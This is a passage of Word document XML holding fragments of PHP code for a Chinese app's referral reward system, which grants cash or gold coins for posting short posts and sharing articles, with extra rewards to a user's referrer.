    <w:p w14:paraId="6755DC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3F6BF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130E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Db::name('yaoqing')-&gt;where(['uid'=&gt;$uid])-&gt;setField('news_num',0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5225FC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$money=$yaoqing['jinbi_news_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166020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00B9D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73B0ED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65878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1B72A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17E853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E65E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CA72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9C6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268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if($type=='money_weitoutiao'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018300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if($yaoqing['money_weitoutiao']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BFE6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发布微头条零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F29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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025875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699C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$db=Db::name('article')-&gt;where(['uid'=&gt;$uid,'weitoutiao'=&gt;1,'hide'=&gt;1])-&gt;whereTime('create_time','today')-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A5C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70DA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31D5D3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21E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$money=$yaoqing['money_weitoutiao'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77962F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57B37B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1BA301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577326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779D9B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7452D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270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F84A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115238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$ret=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3D49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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布微头条奖励￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入你的零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天再发布微头条可获得￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C7A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24E7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E23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54B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if($yaoqing['money_weitoutiao_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0B6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徒弟发布微头条零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E83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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1614ED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BED6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$db=Db::name('article')-&gt;where(['uid'=&gt;$uid,'weitoutiao'=&gt;1,'hide'=&gt;1])-&gt;whereTime('create_time','today')-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCFC7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A2B3B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178C90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998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$money=$yaoqing['money_weitoutiao_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC26F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7D44CD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538596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46F38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07C3B6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7A4D5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6B7E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F38C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5FD7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E558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if($yaoqing['jinbi_weitoutiao']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8833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发布微头条奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47324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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDCE4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83281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$db=Db::name('article')-&gt;where(['uid'=&gt;$uid,'weitoutiao'=&gt;1,'hide'=&gt;1])-&gt;whereTime('create_time','today')-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A10B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14196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4C41C2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CCDF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$money=$yaoqing['jinbi_weitoutiao'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B944E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038ED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191555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626F06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586711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05098F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D34A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E241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60F5BF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if(empty($ret)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC09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json_encode(['ret'=&gt;['h1'=&gt;''.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布微头条奖励</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入你的账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天再发布微头条可获得</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD075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4B75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E5B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B824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5F3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if($yaoqing['jinbi_weitoutiao_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D38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徒弟发布微头条金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAD7C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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697B83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2678B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lastRenderedPageBreak/>
        <w:t>$db=Db::name('article')-&gt;where(['uid'=&gt;$uid,'weitoutiao'=&gt;1,'hide'=&gt;1])-&gt;whereTime('create_time','today')-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194EC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EA6E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48AF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51BB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$money=$yaoqing['jinbi_weitoutiao_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31922E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501890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596BAD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12FA59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29481E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4ED730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598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E70D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F9B9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488D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 == 'money_fenxiang_1'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E54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if($yaoqing['money_fenxiang_1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB8D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师徒分享第三方平台奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEC2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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE9E6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B4B10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$money=$yaoqing['money_fenxiang_1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B9FC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5F29D0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62303F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70112B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5DCD4D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28177E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4DD7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44E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673232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$ret=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF4B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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享平台获得￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入你的零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天再分享可获得￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A960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3B9E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35C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DAF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if($yaoqing['money_fenxiang_1_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614350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徒弟分享师徒第三方平台奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6EDB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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF8BC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A6F5E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$money=$yaoqing['money_fenxiang_1_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7D11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2223D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543B58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03BC65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6D7C9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605535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0307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44F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443F6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5B3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if($yaoqing['jinbi_fenxiang_1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B810F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师徒分享第三方平台奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51463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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0F6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22B3FF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$money=$yaoqing['jinbi_fenxiang_1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5D2A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074417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5A5756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63A190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483B3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235D82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73EB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0B4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5BC95C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if(empty($ret)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F49F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json_encode(['ret'=&gt;['h1'=&gt;''.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享平台获得</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入你的账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天再分享可获得</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019039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0DA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447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10B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3249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if($yaoqing['jinbi_fenxiang_1_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632A99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徒弟分享师徒第三方平台奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745ED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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763573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BA92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$money=$yaoqing['jinbi_fenxiang_1_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240A38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3718C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4BB7B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6304D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4B6178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755A8D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F9A7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A70C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95CC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C20F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 == 'money_fenxiang_2'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EBAA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if($yaoqing['money_fenxiang_2']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE6E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文章分享第三方平台奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686A7A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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FBF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74852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$money=$yaoqing['money_fenxiang_2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C90D2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4AE6BE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11375D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140D6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'money'     =&gt;  $money*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C90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78CF0E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5AF3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3383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2940BD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$ret=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AAD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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'','span'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章分享获得￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已放入你的零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;br&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>明天再分享可获得￥</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C637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176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7810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205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if($yaoqing['money_fenxiang_2_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53784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徒弟文章分享第三方平台奖励零钱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48683E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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$s1,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62317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1E19D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$money=$yaoqing['money_fenxiang_2_s1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D1FF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7342BC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62537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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DFB5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3F3A36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3753CC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C9E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781F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5C4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7177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if($yaoqing['jinbi_fenxiang_2']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5213B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文章分享第三方平台奖励金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A3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$db=Db::name('yaoqing_records')-&gt;where(['uid'=&gt;$uid,'content'=&gt;$content])-&gt;whereTime('time','today')-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435537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74FE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$money=$yaoqing['jinbi_fenxiang_2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE7C5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498EAC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018682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2047E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02CD9D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2518EF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A6E7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15CF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4DC88D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if(empty($ret)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E728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json_encode(['ret'=&gt;['h1'=&gt;''.$money.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','span'=&gt;'</w:t>
      </w:r>
